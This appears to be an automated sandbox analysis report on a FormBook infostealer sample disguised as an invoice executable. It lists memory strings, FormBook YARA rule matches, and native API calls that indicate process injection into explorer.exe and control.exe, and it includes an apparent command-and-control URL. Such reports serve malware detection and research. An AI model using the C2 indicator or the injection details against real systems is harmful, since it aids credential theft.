Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: control.exe, 0000000F.00000002.515402628.000000000578F000.00000004.00000001.sdmp	String found in binary or memory: http://mindcart.ai/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9
Source: INv02938727.exe, 00000001.00000002.250096553.00000000026D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.269026840.0000000006870000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Source: INv02938727.exe, 00000001.00000002.249298987.0000000000829000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00419D60 NtCreateFile,	2_2_00419D60
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00419E10 NtReadFile,	2_2_00419E10
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00419E90 NtClose,	2_2_00419E90
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00419F40 NtAllocateVirtualMemory,	2_2_00419F40
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00419D5A NtCreateFile,	2_2_00419D5A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00419E0A NtReadFile,	2_2_00419E0A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01299910
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012999A0 NtCreateSection,LdrInitializeThunk,	2_2_012999A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01299860
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299840 NtDelayExecution,LdrInitializeThunk,	2_2_01299840
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012998F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_012998F0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299A20 NtResumeThread,LdrInitializeThunk,	2_2_01299A20
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01299A00
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299A50 NtCreateFile,LdrInitializeThunk,	2_2_01299A50
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299540 NtReadFile,LdrInitializeThunk,	2_2_01299540
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012995D0 NtClose,LdrInitializeThunk,	2_2_012995D0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299710 NtQueryInformationToken,LdrInitializeThunk,	2_2_01299710
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012997A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_012997A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299780 NtMapViewOfSection,LdrInitializeThunk,	2_2_01299780
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01299660
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012996E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_012996E0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299950 NtQueueApcThread,	2_2_01299950
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012999D0 NtCreateProcessEx,	2_2_012999D0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299820 NtEnumerateKey,	2_2_01299820
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0129B040 NtSuspendThread,	2_2_0129B040
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012998A0 NtWriteVirtualMemory,	2_2_012998A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299B00 NtSetValueKey,	2_2_01299B00
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0129A3B0 NtGetContextThread,	2_2_0129A3B0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299A10 NtQuerySection,	2_2_01299A10
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299A80 NtOpenDirectoryObject,	2_2_01299A80
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299520 NtWaitForSingleObject,	2_2_01299520
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0129AD30 NtSetContextThread,	2_2_0129AD30
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299560 NtWriteFile,	2_2_01299560
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012995F0 NtQueryInformationFile,	2_2_012995F0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299730 NtQueryVirtualMemory,	2_2_01299730
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0129A710 NtOpenProcessToken,	2_2_0129A710
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299760 NtOpenProcess,	2_2_01299760
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0129A770 NtOpenThread,	2_2_0129A770
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299770 NtSetInformationFile,	2_2_01299770
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299FE0 NtCreateMutant,	2_2_01299FE0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299610 NtEnumerateValueKey,	2_2_01299610
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299670 NtQueryInformationProcess,	2_2_01299670
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01299650 NtQueryValueKey,	2_2_01299650
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012996D0 NtCreateKey,	2_2_012996D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD95D0 NtClose,LdrInitializeThunk,	15_2_04DD95D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9540 NtReadFile,LdrInitializeThunk,	15_2_04DD9540
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD96D0 NtCreateKey,LdrInitializeThunk,	15_2_04DD96D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD96E0 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_04DD96E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9650 NtQueryValueKey,LdrInitializeThunk,	15_2_04DD9650
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9660 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_04DD9660
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9FE0 NtCreateMutant,LdrInitializeThunk,	15_2_04DD9FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9780 NtMapViewOfSection,LdrInitializeThunk,	15_2_04DD9780
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9710 NtQueryInformationToken,LdrInitializeThunk,	15_2_04DD9710
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9840 NtDelayExecution,LdrInitializeThunk,	15_2_04DD9840
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9860 NtQuerySystemInformation,LdrInitializeThunk,	15_2_04DD9860
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD99A0 NtCreateSection,LdrInitializeThunk,	15_2_04DD99A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_04DD9910
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9A50 NtCreateFile,LdrInitializeThunk,	15_2_04DD9A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD95F0 NtQueryInformationFile,	15_2_04DD95F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9560 NtWriteFile,	15_2_04DD9560
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DDAD30 NtSetContextThread,	15_2_04DDAD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9520 NtWaitForSingleObject,	15_2_04DD9520
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9670 NtQueryInformationProcess,	15_2_04DD9670
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9610 NtEnumerateValueKey,	15_2_04DD9610
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD97A0 NtUnmapViewOfSection,	15_2_04DD97A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DDA770 NtOpenThread,	15_2_04DDA770
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9770 NtSetInformationFile,	15_2_04DD9770
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9760 NtOpenProcess,	15_2_04DD9760
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DDA710 NtOpenProcessToken,	15_2_04DDA710
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9730 NtQueryVirtualMemory,	15_2_04DD9730
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD98F0 NtReadVirtualMemory,	15_2_04DD98F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD98A0 NtWriteVirtualMemory,	15_2_04DD98A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DDB040 NtSuspendThread,	15_2_04DDB040
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9820 NtEnumerateKey,	15_2_04DD9820
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD99D0 NtCreateProcessEx,	15_2_04DD99D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9950 NtQueueApcThread,	15_2_04DD9950
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9A80 NtOpenDirectoryObject,	15_2_04DD9A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9A10 NtQuerySection,	15_2_04DD9A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9A00 NtProtectVirtualMemory,	15_2_04DD9A00
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9A20 NtResumeThread,	15_2_04DD9A20
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DDA3B0 NtGetContextThread,	15_2_04DDA3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD9B00 NtSetValueKey,	15_2_04DD9B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E29E90 NtClose,	15_2_02E29E90
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E29E10 NtReadFile,	15_2_02E29E10
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E29F40 NtAllocateVirtualMemory,	15_2_02E29F40
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E29D60 NtCreateFile,	15_2_02E29D60
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E29E0A NtReadFile,	15_2_02E29E0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E29D5A NtCreateFile,	15_2_02E29D5A

Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 1_2_00B5C2B0	1_2_00B5C2B0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 1_2_00B59968	1_2_00B59968
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041E000	2_2_0041E000
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041D1AB	2_2_0041D1AB
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041E258	2_2_0041E258
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00401208	2_2_00401208
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041DD7D	2_2_0041DD7D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00409E40	2_2_00409E40
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00409E3B	2_2_00409E3B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041DF3E	2_2_0041DF3E
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041E7B3	2_2_0041E7B3
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01274120	2_2_01274120
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125F900	2_2_0125F900
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0132E824	2_2_0132E824
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311002	2_2_01311002
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012820A0	2_2_012820A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013220A8	2_2_013220A8
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126B090	2_2_0126B090
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013228EC	2_2_013228EC
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01322B28	2_2_01322B28
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128EBB0	2_2_0128EBB0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131DBD2	2_2_0131DBD2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013103DA	2_2_013103DA
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0130FA2B	2_2_0130FA2B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013222AE	2_2_013222AE
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01250D20	2_2_01250D20
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01322D07	2_2_01322D07
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01321D55	2_2_01321D55
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282581	2_2_01282581
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126D5E0	2_2_0126D5E0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013225DD	2_2_013225DD
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126841F	2_2_0126841F
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131D466	2_2_0131D466
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01321FF1	2_2_01321FF1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0132DFCE	2_2_0132DFCE
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01276E30	2_2_01276E30
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131D616	2_2_0131D616
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01322EF7	2_2_01322EF7
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5D466	15_2_04E5D466
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA841F	15_2_04DA841F
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAD5E0	15_2_04DAD5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E625DD	15_2_04E625DD
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC2581	15_2_04DC2581
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E61D55	15_2_04E61D55
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E62D07	15_2_04E62D07
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D90D20	15_2_04D90D20
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E62EF7	15_2_04E62EF7
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB6E30	15_2_04DB6E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5D616	15_2_04E5D616
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E61FF1	15_2_04E61FF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E6DFCE	15_2_04E6DFCE
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E628EC	15_2_04E628EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAB090	15_2_04DAB090
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E620A8	15_2_04E620A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC20A0	15_2_04DC20A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E6E824	15_2_04E6E824
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51002	15_2_04E51002
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9F900	15_2_04D9F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB4120	15_2_04DB4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E622AE	15_2_04E622AE
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5DBD2	15_2_04E5DBD2
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E503DA	15_2_04E503DA
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCEBB0	15_2_04DCEBB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E62B28	15_2_04E62B28
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2E258	15_2_02E2E258
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2E000	15_2_02E2E000
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2D1AB	15_2_02E2D1AB
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E19E40	15_2_02E19E40
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E19E3B	15_2_02E19E3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E12FB0	15_2_02E12FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E12D87	15_2_02E12D87
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E12D90	15_2_02E12D90

Source: C:\Users\user\Desktop\INv02938727.exe	Code function: String function: 0125B150 appears 45 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04D9B150 appears 35 times

Source: INv02938727.exe	Binary or memory string: OriginalFilename vs INv02938727.exe
Source: INv02938727.exe, 00000001.00000002.250096553.00000000026D1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs INv02938727.exe
Source: INv02938727.exe, 00000001.00000002.248567482.00000000000D2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSafeHeapHandleCache.exe0 vs INv02938727.exe
Source: INv02938727.exe, 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs INv02938727.exe
Source: INv02938727.exe	Binary or memory string: OriginalFilename vs INv02938727.exe
Source: INv02938727.exe, 00000002.00000002.318304038.000000000134F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INv02938727.exe
Source: INv02938727.exe, 00000002.00000002.315939770.00000000007F2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSafeHeapHandleCache.exe0 vs INv02938727.exe
Source: INv02938727.exe, 00000002.00000002.319510745.0000000003395000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs INv02938727.exe
Source: INv02938727.exe	Binary or memory string: OriginalFilenameSafeHeapHandleCache.exe0 vs INv02938727.exe

Source: INv02938727.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
